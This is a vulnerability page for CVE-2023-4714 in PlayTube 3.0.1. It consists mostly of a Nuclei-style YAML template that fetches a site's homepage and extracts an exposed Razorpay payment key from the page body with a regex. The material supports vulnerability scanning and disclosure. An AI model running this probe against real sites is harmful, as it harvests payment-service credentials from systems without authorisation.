CVE-2023-4714: PlayTube 3.0.1 - Information Disclosure

2025-08-01 PlayTube 3.0.1 PoC Public

Description

A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.

PoC

id: CVE-2023-4714

info:
  name: PlayTube 3.0.1 - Information Disclosure
  author: Farish
  severity: high
  description: |
    A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4714
    - https://www.exploitalert.com/view-details.html?id=39826
    - https://vuldb.com/?ctiid.238577
    - https://vuldb.com/?id.238577
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4714
    cwe-id: CWE-200
    epss-score: 0.05452
    epss-percentile: 0.92325
    cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: playtube
    product: playtube
  tags: cve2023,cve,playtube,exposure,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "razorpay_options"
          - "PlayTube"
          - "key:"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'key: "([a-z_A-Z0-9]+)"'
# digest: 4a0a0047304502210095e9fbcaaeec684ffaf875732d7d5dc62a25aa352d3af1a6f87fabc697fd43950220034c51cbab86d6c9c8c4dc243e4a0cb9852d89f1d62b96a8d193a15c1642c3ac:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities